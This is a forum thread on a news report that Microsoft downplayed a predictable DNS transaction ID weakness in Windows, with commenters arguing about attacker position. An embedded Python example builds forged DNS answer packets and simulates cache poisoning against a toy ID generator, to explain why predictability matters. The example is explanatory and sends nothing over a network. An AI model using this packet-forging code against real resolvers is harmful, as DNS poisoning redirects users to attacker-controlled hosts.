Microsoft Downplaying Recent DNS Vulnerability
Microsoft Watch writes "Microsoft downplays a recent DNS vulnerability in all Microsoft operating systems (XP, Vista, 2000, and 2003), claims Amit Klein, the security researcher who published the original vulnerability description (PDF) earlier this month. According to Klein, the description in Microsoft's Secure Windows Initiative blog entry is misleading, contains disinformation about the DNS transaction ID algorithm, and downplays the severity of the issue. Klein refutes Microsoft's claim that there is no way to reproduce the next transaction ID, given a series of observed transaction IDs. He shows that this is possible in his paper, which Microsoft had before publishing the SWI post, as well as on the series of data provided in the SWI blog itself."
Or rather than spending all that effort in trying to downplay it, they could just fix the vulnerability and stop all the would-be attackers in their tracks. Nah, that would make too much sense.
Reading TFA and the details on the vulnerability, it seems to me that the attacker must first be able to sniff packets being sent to the DNS server from the desktop PC. This means the attacker apparently must have access to the network the desktop is on.
Now, forgive me if I'm missing the obvious, but why would an attacker, *who can read an outgoing request to a DNS server in real time*, not simply craft a reply using the outgoing packet data as a model? Why bother figuring out the transaction ID when an attacker, according to the scenarios given, *should already have it*, having gotten it from the sniffed packet.
I just don't see how being predictable makes this any worse, when you're apparently dealing with someone already on your own network, or on the route between you and your DNS server.
$DUDE finds vulnerability in $PRODUCT made by $VENDOR. /., lots of page hits, lots of ad revenue, PROFIT!!
$DUDE claims this is really serious and should be fixed at once.
(optional) $DUDE does the Right Thing and tells $VENDOR about it so they can fix it before he goes public.
$VENDOR replies that $DUDE's claims are overblown.
Flamewar on
(optional, much later) $VENDOR quietly fixes $PRODUCT.
April 30th, 2007 - Microsoft Security Response Center (MSRC) were informed of this issue.
March 18th, 2008 - Microsoft releases a service pack for Windows Vista (Vista SP1), which includes a fix for this issue.
April 8th, 2008 - Microsoft issues a fix ([19]) for Windows Vista, Windows XP SP2, Windows 2003 and Windows 2000 SP4. The fix is downloadable at Microsoft's website. Simultaneously, Trusteer discloses the vulnerability to the public (in the form of this document).
Also, as stated above, the scenarios required to pull this off are pointless. If someone is sniffing your traffic in your switched network, they already have access to your network that could invoke far more problems than simple DNS poisoning.
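The two comments above (the one asking why a sniffer would bother predicting IDs, and this one) both turn on where the attacker sits. Here is an added example, not code from the article, the Trusteer paper or any commenter, that puts the two positions side by side: an on-path attacker copies the 16-bit transaction ID straight out of the sniffed query, while an off-path attacker who only saw earlier IDs (say, from lookups the victim made for a name whose authoritative server the attacker runs) has to guess the ID of a later query blind. The packet layout is the RFC 1035 header; the "predictable" generator is a hypothetical toy LCG chosen for the demo and is not Windows's algorithm, and all names and addresses are made up.

```python
import random
import struct

# Added example, not from the article or the commenters. Wire format follows
# the RFC 1035 DNS header; ToyLcgIds is a hypothetical generator, not Windows's.

def build_query(txid, name):
    """Minimal DNS query (one A/IN question) with the given 16-bit ID."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN

def parse_txid(packet):
    """The ID is the first two bytes of the header; a sniffer reads it directly."""
    return struct.unpack("!H", packet[:2])[0]

def forge_answer(txid, query, ip):
    """Forged response: echoes the question section and answers with `ip`."""
    question = query[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA set
    rdata = bytes(int(o) for o in ip.split("."))
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 3600, len(rdata)) + rdata  # ptr to QNAME
    return header + question + rr

def accepts(query, response):
    """Simplified stub-resolver check: same transaction ID and same question."""
    return parse_txid(response) == parse_txid(query) and response[12:len(query)] == query[12:]

class RandomIds:
    """Unpredictable IDs. Seeded only so the demo is reproducible."""
    def __init__(self, seed=1):
        self._rng = random.Random(seed)
    def next_id(self):
        return self._rng.getrandbits(16)

class ToyLcgIds:
    """Hypothetical predictable generator (classic 16-bit LCG). NOT Windows's algorithm."""
    A, C, M = 25173, 13849, 1 << 16
    def __init__(self, seed=1):
        self._state = seed & 0xFFFF
    def next_id(self):
        self._state = (self.A * self._state + self.C) % self.M
        return self._state

def on_path_attack(resolver, name="www.example.com", evil_ip="203.0.113.7"):
    """Attacker who sees the live query: no prediction needed, just copy the ID."""
    query = build_query(resolver.next_id(), name)
    sniffed_id = parse_txid(query)
    return accepts(query, forge_answer(sniffed_id, query, evil_ip))

def off_path_attack(resolver, guess_fn, name="www.example.com", evil_ip="203.0.113.7"):
    """Attacker who cannot see the target query. They saw one earlier ID (e.g. on
    a query the victim sent to a nameserver they control) and must now guess the
    ID of a later query, sending one forged answer per guess."""
    observed = resolver.next_id()                    # visible to the attacker
    query = build_query(resolver.next_id(), name)    # target query, never seen
    return any(accepts(query, forge_answer(g, query, evil_ip)) for g in guess_fn(observed))

def predict_lcg(observed):
    """Knowing the toy algorithm, one observed ID yields the next one exactly."""
    return [(ToyLcgIds.A * observed + ToyLcgIds.C) % ToyLcgIds.M]

def spray(observed, budget=256):
    """With unpredictable IDs the only blind option is brute force within a budget."""
    return range(budget)

def success_rate(make_resolver, guess_fn, trials=200):
    """Fraction of independent off-path attempts that poison the resolver."""
    return sum(off_path_attack(make_resolver(i), guess_fn) for i in range(trials)) / trials

if __name__ == "__main__":
    print("on-path, random IDs :", on_path_attack(RandomIds(7)))
    print("on-path, LCG IDs    :", on_path_attack(ToyLcgIds(7)))
    print("off-path, LCG IDs   :", success_rate(ToyLcgIds, predict_lcg))
    print("off-path, random IDs:", success_rate(RandomIds, spray))
```

The on-path case succeeds regardless of the generator, which is the sniffer argument made above. The off-path case is where predictability changes the picture: with the toy LCG one previously observed ID is enough to forge a single accepted answer, while against random IDs a 256-packet spray lands well under one percent of the time. The budget and the LCG constants are demo choices, not figures from the paper.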
"Are you sure you want to poison the DNS stub resolver cache? Allow or Deny."
That'll fix it.
Most of the stuff on